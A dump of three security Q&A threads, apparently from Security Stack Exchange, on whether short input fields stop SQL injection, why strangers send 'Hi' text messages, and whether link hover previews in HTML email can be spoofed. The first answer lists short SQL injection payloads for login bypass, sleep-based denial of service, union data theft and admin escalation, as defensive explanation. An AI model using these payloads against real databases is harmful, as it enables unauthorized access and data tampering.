152,606 | I was reading about SQL injection and saw this, which got me thinking: input fields as small as possible to reduce the likelihood of a hacker being able to squeeze SQL code into the field without it being truncated (which usually leads to a T-SQL syntax error). Source: Microsoft SQL Server 2008 R2 Unleashed What is the is the shortest field size where SQL injection can cause harm? With harm being database modification or returning results not intended by design. Including an end comment marker ( -- ) in a two character field would not cause harm, it would just cause a failed query. The potential hacker, might learn the field is susceptible to injection, but they are unable to leverage it. | No, there is no length that is too short to be exploitable (at least in some situations). A length-filter is not a valid protection against SQL injection, and prepared statements really are the only proper defense. A length filter is however a good measure as defense in depth (as are integer filters, alphanum filters, etc). There are many situations where e.g. valid input could never be above say 30 characters, but where meaningful exploitation requires more. It should (but probably doesn't) go without saying that any filtering as defense in depth must be taking place server-side as anything client-side can simply be bypassed. Restriction Bypass Restriction clauses (e.g. AND / OR ) can be bypassed by two characters, which can cause real harm, not just a failed query. The most simple example is a login (other examples would be the unauthorized deletion of additional data): SELECT * FROM users WHERE userid = [id] AND password = [password] Injection: id = 1#
password = wrong_password Payload: 2 chars DoS DoS attacks require very few characters. In a MySQL example, it takes 7 for the actual call + x for the given seconds + whatever is needed to be able to call the function and fix the query. Example: SELECT * FROM users WHERE userid = [id] Injection (this is a valid injection, a longer form would be 1 AND sleep(99) ): sleep(99) Payload: 9 chars Reading Data If the data is displayed, the length depends mainly on the table and column name. I'll assume equal column count for all tables (it may happen, and it saves characters). Example: SELECT * FROM comments WHERE commentid = [id] Injection: 1 union select * from users Payload: 27 chars. Editing Data Unauthorized database modifications can also be achieved with few characters. Example: UPDATE users SET password = '[password]' WHERE id = [id] Injection (into password): ',isadmin='1 Payload: 12 chars A restriction bypass would also work (the result is that all passwords are now empty*): '# Payload: 2 chars * The password example is used for simplicity; passwords should be hashed making the example impossible. The example still applies in all similar situations (updating a username, updating permissions, and so on) | {
"source": [
"https://security.stackexchange.com/questions/152606",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24064/"
]
} |
152,854 | I routinely receive seemingly harmless SMS messages from unknown people. They're usually simple, like "Hi" or "Hello" or "Are you there?". This happens several times a week, and certainly often enough that it seems to be some sort of organized, ongoing effort to get me to reply. I'm trying to understand why someone (or several someones) would bother sending such messages. Is this a known hacking/phishing technique? If so, is there useful information that someone can obtain just by sending an SMS message, and what can be determined if the recipient replies (assuming they don't include any personal or security information in the reply)? | Some telephone or SMS numbers allow for an additional charge that is automatically recovered by your phone provider and reversed to the owner of the number. This is mainly used (legally) for some TV games where each participant pays a little money when calling a special number or sending a SMS. At the end, either one of the players earns something, or the answers of participants were used for an election (a miss election for example). So a not so good company could set up a system like that and send tons of SMSs asking for a reply to such an overcharged number - and optionally omit to say that it is overcharged... The cost of mass sending SMS is low, so if they get an acceptable return rate, they will earn some money with it. When you are aware of that, and willingly send an overcharged SMS to participate in the election of the song of the year, all is fine. But when you receive a SMS just pretending to come from a friend and end in paying more than the simple SMS it is robbery. But as this kind of company hides themselves abroad or vanish as soon as you reclaim to have your money back, it is much better to never send them any overcharged SMS. | {
"source": [
"https://security.stackexchange.com/questions/152854",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3222/"
]
} |
152,893 | We are using a browser based email client and the email content is in HTML. One of my employers told us that if we receive a suspicious email with links, we have to hover over the link (to check that it is not spoofed) before clicking it. Hovering over triggers an action to display the underlying link in the browsers status bar. However, would someone be able to spoof this action and try to do something funny? This is a similar thread but it discusses thumbnails of attachments and not links in the email. | One of my employers told us that if we receive a suspicious email with links, we have to hover over the link (to check that it is not spoofed) before clicking it. When you mouseover a link, the value of the href attribute is displayed in the status bar. Since this is the link target, it can give you an idea about where the link is going. would someone be able to spoof this action and try to do something funny? Generally, yes. The actual link target can be "spoofed" using Javascript: It is quite common for websites to exchange the href value with another link as soon as the user clicks on it. For example, you can observe this when visiting Google search results. When you mouseover one of the links, it will be displayed as https://security.stackexchange.com/... but as soon as you click it, that event is captured and you visit an intermediate site first ( https://www.google.com/url?... ) which redirects you to the actual target. But any well-designed (web-based) mail client will not execute any JS in HTML e-mails. Active script content in e-mails is dangerous - not only because it potentially results in an XSS flaw in the mail client but because it can also be used to run JS-based exploits against the browser or simply inform the sender that you have opened the mail. So, if your mail client disallows JS in e-mails - which it most likely does - then the link displayed on mouseover is indeed the correct link target. But you should be aware of other attempts to deceive you, such as homograph attacks or an overly long URL that disguises the actual target domain. It's not as easy to analyze an URL in the status bar as it is from looking at it in the address bar. In a more advanced attack, the attacker could also have compromised a legitimate site beforehand (e.g. through a persistend XSS flaw) and you won't be able to tell from the link at all that the site now actually hosts dangerous content. | {
"source": [
"https://security.stackexchange.com/questions/152893",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34466/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.